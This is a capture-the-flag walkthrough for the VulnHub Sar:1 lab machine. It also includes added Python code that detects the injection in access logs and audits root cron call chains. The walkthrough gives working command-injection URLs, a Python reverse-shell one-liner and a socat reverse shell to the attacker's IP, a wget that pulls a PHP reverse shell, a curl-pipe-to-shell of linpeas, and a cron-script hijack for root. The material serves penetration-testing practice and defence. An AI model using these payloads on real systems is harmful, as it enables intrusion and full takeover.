https://www.vulnhub.com/entry/sar-1,425/

Discover Target Networks

  • sudo nmap -sn 192.168.122.1-255
  • sudo nmap -p- 192.168.122.207

Port 80

  • run dirb http://192.168.122.207 and find http://192.168.122.207/phpinfo.php
  • Visit http://192.168.122.207/robots.txt and find http://192.168.122.207/sar2HTML/

sar2HTML

Reverse Shell

Python
  • we can check whether python3 exists on the machine:
  • http://192.168.122.207/sar2HTML/index.php?plot=;which python3
  • then we run ncat -nvlp 4444 on the attacker’s machine and go to http://192.168.122.207/sar2HTML/index.php?plot=;python3 -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.122.101",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")' ; now we have a reverse shell
PHP
  • get a copy of the PHP reverse shell script into the current directory with cp /usr/share/webshells/php/php-reverse-shell.php . and change the IP and port to the attacker’s
  • start a simple HTTP server on the attacker’s machine using Python 3: python -m http.server 8888
  • download the PHP script onto the target machine by visiting http://192.168.122.207/sar2HTML/index.php?plot=;wget http://192.168.122.101:8888/php-reverse-shell.php (or upload it)
  • start a listener on the attacker’s machine using ncat -nvlp 7777 and visit http://192.168.122.207/sar2HTML/php-reverse-shell.php; now we have a reverse shell
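The plot parameter above is being passed to a shell unescaped, which is why a leading ; lets extra commands through. From the defender’s side, the same requests are easy to spot in the web server’s access log. The following detector is an added example and not part of the original writeup; the log lines are constructed to mirror the requests made above, and the /sar2HTML/ path prefix and the set of flagged shell metacharacters are my own choices.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Constructed Apache combined-format log lines (not taken from the original page).
# The first two mirror the sar2HTML requests the walkthrough makes; the rest are benign.
SAMPLE_LOG = """\
192.168.122.101 - - [10/Mar/2024:12:00:01 +0000] "GET /sar2HTML/index.php?plot=;which%20python3 HTTP/1.1" 200 512 "-" "curl/7.88"
192.168.122.101 - - [10/Mar/2024:12:00:05 +0000] "GET /sar2HTML/index.php?plot=;wget%20http://192.168.122.101:8888/php-reverse-shell.php HTTP/1.1" 200 512 "-" "curl/7.88"
192.168.122.50 - - [10/Mar/2024:12:01:00 +0000] "GET /sar2HTML/index.php?plot=sar01 HTTP/1.1" 200 8192 "-" "Mozilla/5.0"
192.168.122.50 - - [10/Mar/2024:12:01:03 +0000] "GET /robots.txt HTTP/1.1" 200 33 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Shell metacharacters that never belong in a value naming a sar data file.
SHELL_META_RE = re.compile(r'[;|&`$\n]')

def parse_query(query):
    """Split a raw query string into (key, value) pairs, percent-decoding each side.
    Done by hand rather than with parse_qsl so that ';' stays part of the value
    (older Python versions treat ';' as a pair separator)."""
    pairs = []
    for chunk in query.split('&'):
        if chunk:
            key, _, value = chunk.partition('=')
            pairs.append((unquote_plus(key), unquote_plus(value)))
    return pairs

def suspicious_params(query):
    """Return {param: decoded value} for parameters carrying shell metacharacters."""
    return {k: v for k, v in parse_query(query) if SHELL_META_RE.search(v)}

def detect_injection(log_text, path_prefix="/sar2HTML/"):
    """Scan access-log text and return one alert per request under path_prefix
    whose query string contains shell metacharacters."""
    alerts = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a recognisable access-log line
        url = urlsplit(m["target"])
        if not url.path.startswith(path_prefix):
            continue
        flagged = suspicious_params(url.query)
        if flagged:
            alerts.append({"ip": m["ip"], "time": m["ts"], "path": url.path,
                           "status": int(m["status"]), "params": flagged})
    return alerts

if __name__ == "__main__":
    for alert in detect_injection(SAMPLE_LOG):
        print(f'{alert["time"]} {alert["ip"]} {alert["path"]} {alert["params"]}')
```

Matching on decoded values matters: the space in `which python3` arrives as %20, and the whole payload can be percent-encoded, so a pattern applied to the raw request line would miss it. The benign plot=sar01 request and the robots.txt fetch produce no alert.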

Explore the target machine

  • Get a better shell using Python: python3 -c 'import pty;pty.spawn("/bin/bash")'
  • list all the users on the target machine with cat /etc/passwd; we see an actual user called love
  • Try running linpeas.sh: curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh
  • we find out there is a cron job that root runs every 5 minutes:
*/5  *    * * *   root    cd /var/www/html/ && sudo ./finally.sh
  • if we cat /var/www/html/finally.sh,
#!/bin/sh

./write.sh

it’s a shell script that runs /var/www/html/write.sh, and if we open write.sh, it is a small shell script that creates a file in /tmp

  • If we ls -l /var/www/html to see all the file permissions and ownerships, we can see that finally.sh is owned by root, so we can’t modify it right now, but write.sh is owned by www-data, which is our current daemon user.

Privilege escalation

  • Because that cron job tells us write.sh is executed by root every 5 minutes, we can simply modify it to give us another reverse shell, and that one will run as root.
  • we can’t just use nano or vi in this junk shell, as user www-data doesn’t have a TTY
  • we can run echo "socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:192.168.122.101:4444" >> write.sh to append the reverse shell command to it.
  • Now open a listener on the attacker’s machine and just wait
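The root cause of this escalation is a root cron job whose call chain reaches a file a low-privilege user can edit: finally.sh is root-owned, but it calls ./write.sh, which belongs to www-data. The audit below is an added example, not part of the original writeup. It parses system-crontab lines, resolves the scripts each root entry runs (following a leading cd and one level of scripts invoked from inside those scripts), and reports any that are not root-owned or are group/world-writable. The crontab text is constructed to match the entry found above, and the fs_root parameter and the staged temporary tree (where write.sh is made world-writable to stand in for the www-data-owned file) are my own additions so the check runs offline.

```python
import os
import re
import shlex
import stat
import tempfile

# Constructed /etc/crontab-style content reproducing the entry found on the target.
SAMPLE_CRONTAB = """\
# m h dom mon dow user  command
*/5  *    * * *   root    cd /var/www/html/ && sudo ./finally.sh
"""

WRAPPERS = {"sudo", "nice", "nohup"}
INTERPRETERS = {"sh", "bash", "dash", "python", "python3", "perl"}

def parse_system_crontab(text):
    """Yield (user, command) from system-crontab lines: five time fields, user, command."""
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(None, 6)
        if len(fields) == 7:
            yield fields[5], fields[6]

def scripts_in_command(command, cwd="/"):
    """Return absolute paths of programs a shell command line runs, following a
    leading 'cd DIR' so that './finally.sh' resolves against DIR."""
    paths = []
    for segment in re.split(r"&&|\|\||;|\|", command):
        try:
            tokens = shlex.split(segment)
        except ValueError:
            continue  # unbalanced quotes; skip this segment
        while tokens and tokens[0] in WRAPPERS:
            tokens.pop(0)
        if not tokens:
            continue
        if tokens[0] == "cd":
            if len(tokens) > 1:
                cwd = tokens[1]
            continue
        if tokens[0] in INTERPRETERS and len(tokens) > 1:
            tokens.pop(0)  # 'sh script.sh': the script is the interesting file
        if "/" in tokens[0]:
            paths.append(os.path.normpath(os.path.join(cwd, tokens[0])))
    return paths

def check_script(path, fs_root="/", depth=0, seen=None):
    """Return {path: [reasons]} for this script and anything it invokes that a
    non-root user could alter. fs_root re-bases paths so a staged tree can be audited."""
    seen = set() if seen is None else seen
    findings = {}
    if path in seen or depth > 3:
        return findings
    seen.add(path)
    real = os.path.join(fs_root, path.lstrip("/"))
    try:
        st = os.stat(real)
    except FileNotFoundError:
        findings[path] = ["invoked by root but does not exist"]
        return findings
    reasons = []
    if st.st_uid != 0:
        reasons.append(f"owned by uid {st.st_uid}, not root")
    if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
        reasons.append("writable by group or others")
    if reasons:
        findings[path] = reasons
    if st.st_size > 1_000_000:
        return findings  # not a text script; nothing to follow
    with open(real, encoding="utf-8", errors="replace") as fh:
        for line in fh:
            line = line.strip()
            if line and not line.startswith("#"):
                for child in scripts_in_command(line, cwd=os.path.dirname(path)):
                    findings.update(check_script(child, fs_root, depth + 1, seen))
    return findings

def audit_crontab(text, fs_root="/"):
    """Audit every root cron entry and report scripts in its call chain that are
    not root-owned or are group/world-writable."""
    findings = {}
    for user, command in parse_system_crontab(text):
        if user == "root":
            for script in scripts_in_command(command):
                findings.update(check_script(script, fs_root))
    return findings

def stage_demo_tree():
    """Build a throwaway tree with the layout from the walkthrough: finally.sh calls
    ./write.sh; write.sh is made world-writable to stand in for the www-data-owned file."""
    root = tempfile.mkdtemp()
    html = os.path.join(root, "var/www/html")
    os.makedirs(html)
    with open(os.path.join(html, "finally.sh"), "w") as fh:
        fh.write("#!/bin/sh\n\n./write.sh\n")
    os.chmod(os.path.join(html, "finally.sh"), 0o755)
    with open(os.path.join(html, "write.sh"), "w") as fh:
        fh.write("#!/bin/sh\ntouch /tmp/demo_marker\n")
    os.chmod(os.path.join(html, "write.sh"), 0o777)
    return root

if __name__ == "__main__":
    for script, reasons in audit_crontab(SAMPLE_CRONTAB, fs_root=stage_demo_tree()).items():
        print(script, "->", "; ".join(reasons))
```

Run against a live host with audit_crontab(open("/etc/crontab").read()) and the finding for /var/www/html/write.sh is exactly the condition exploited above: a root-owned wrapper is not enough when anything it calls is owned or writable by the web server user. The fix is to make every file in the chain root-owned and non-writable by others, and to drop the needless sudo in the cron entry.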

Capture the flags

  • now that we are root, we can change the passwords, install openssh-server and start it, then SSH into the machine instead
  • cat /home/love/Desktop/user.txt to get user flag
  • cat /root/root.txt to get root flag